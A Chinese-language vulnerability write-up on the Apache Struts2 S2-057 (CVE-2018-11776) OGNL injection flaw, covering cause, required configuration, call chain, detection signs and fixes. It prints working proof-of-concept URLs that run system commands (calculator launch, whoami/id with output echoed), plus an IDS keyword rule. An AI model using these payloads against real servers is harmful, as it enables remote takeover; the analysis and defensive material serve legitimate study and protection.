Apache Struts2 S2-057 (CVE-2018-11776) 远程代码执行漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2018-11776 (S2-057)
漏洞类型<\/strong>: 远程代码执行 (RCE)
影响版本<\/strong>: Apache Struts 2.3 - 2.3.34, 2.5 - 2.5.16
发现者<\/strong>: Semmle Security Research team 的 Man YueMo
披露日期<\/strong>: 2018年8月22日
危险等级<\/strong>: 高危<\/p>

漏洞原理<\/h2>
该漏洞源于Struts2框架在处理namespace功能定义XML配置时存在缺陷：<\/p>

当namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace时<\/li>
或者url标签未设置value和action值且上层动作未设置或用通配符namespace时<\/li> <\/ol>
这两种情况都可能导致OGNL表达式注入，从而造成远程代码执行。<\/p>
环境配置要求<\/h2>
要成功利用此漏洞，需要满足以下配置条件：<\/p>

在struts.xml<\/code>中必须配置：<\/p>
<constant<\/span> name=<\/span>"struts.mapper.alwaysSelectFullNamespace"<\/span> value=<\/span>"true"<\/span> \/><\/span> <\/span><\/span><\/code><\/pre><\/li> 在result标签中返回类型必须设置为redirectAction<\/code>或chain<\/code>：<\/p> <result<\/span> type=<\/span>"redirectAction"<\/span>><\/span> <\/span><\/span> <param<\/span> name=<\/span>"actionName"<\/span>><\/span>...<\/param><\/span> <\/span><\/span><\/result><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞利用方式<\/h2> 1. 数值计算验证<\/h3> 最简单的验证方式，通过URL注入OGNL表达式：<\/p> http:\/\/target\/%{(100+200)} <\/code><\/pre> 成功执行后会返回计算结果300<\/code>并发生跳转。<\/p> 2. 弹出计算器<\/h3> Struts2 2.3.20版本POC:<\/h4> http:\/\/target\/${ (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).( #calc=@java.lang.Runtime@getRuntime().exec('calc.exe')) } <\/code><\/pre> Struts2 2.3.34版本POC:<\/h4> http:\/\/target\/${ (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).( #calc=@java.lang.Runtime@getRuntime().exec('gnome-calculator')) } <\/code><\/pre> 3. 命令回显执行<\/h3> 两个版本都利用com.opensymphony.xwork2.dispatcher.HttpServletResponse<\/code>对象来打印命令执行结果。<\/p> Struts2 2.3.20版本POC:<\/h4> http:\/\/target\/${ (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).( #res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(), #res.println('Command Output:'), #res.println(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()), #res.close()) } <\/code><\/pre> Struts2 2.3.34版本POC:<\/h4> http:\/\/target\/${ (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).( #res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(), #res.println('Command Output:'), #res.println(@java.lang.Runtime@getRuntime().exec('id').getInputStream()), #res.close()) } <\/code><\/pre> 漏洞分析<\/h2> 关键调用链<\/h3> 请求进入ServletActionRedirectResult.class<\/code><\/li> this.namespace<\/code>值来自getNamespace()<\/code>方法<\/li> 通过getUriFromActionMapping()<\/code>返回URI字符串<\/li> 值赋给tmpLocation<\/code>变量<\/li> 进入setLocation<\/code>方法<\/li> 通过super.execute<\/code>调用ServletActionResult<\/code><\/li> 在execute<\/code>方法体内调用conditionalParse<\/code>方法<\/li> 最终在translateVariables()<\/code>方法内执行OGNL表达式<\/li> <\/ol> 关键点<\/h3> 弹出计算器后，lastFinalLocation<\/code>的值为当前执行后的句柄，作为响应跳转的action地址<\/li> 命令回显时，lastFinalLocation<\/code>返回NULL，不会发生302跳转，返回状态码200<\/li> <\/ul> 检测特征<\/h2> 数值计算和弹计算器<\/strong>:<\/p> 返回状态码302<\/li> Location跳转字段含有特征句柄字符串<\/li> <\/ul> <\/li> 命令回显<\/strong>:<\/p> 返回状态码200<\/li> 响应中包含命令执行结果<\/li> <\/ul> <\/li> <\/ol> 防御措施<\/h2> 升级框架<\/strong>:<\/p> 升级到官方最新版本(当时为Struts 2.3.35或2.5.17及以上)<\/li> <\/ul> <\/li> 代码安全<\/strong>:<\/p> 严格验证用户输入<\/li> 避免使用通配符namespace配置<\/li> <\/ul> <\/li> IDS规则<\/strong>:<\/p> 监控302跳转中包含OGNL表达式的请求<\/li> 拦截包含#_memberAccess<\/code>等关键字的请求<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> 官方安全公告: Apache Struts Security Bulletin S2-057<\/a><\/li> EXP脚本: GitHub - Ivan1ee<\/a><\/li> 漏洞报告: CVE-2018-11776<\/a><\/li> <\/ul> 注意：本文仅用于技术研究与教育目的，切勿用于非法用途。<\/em><\/p>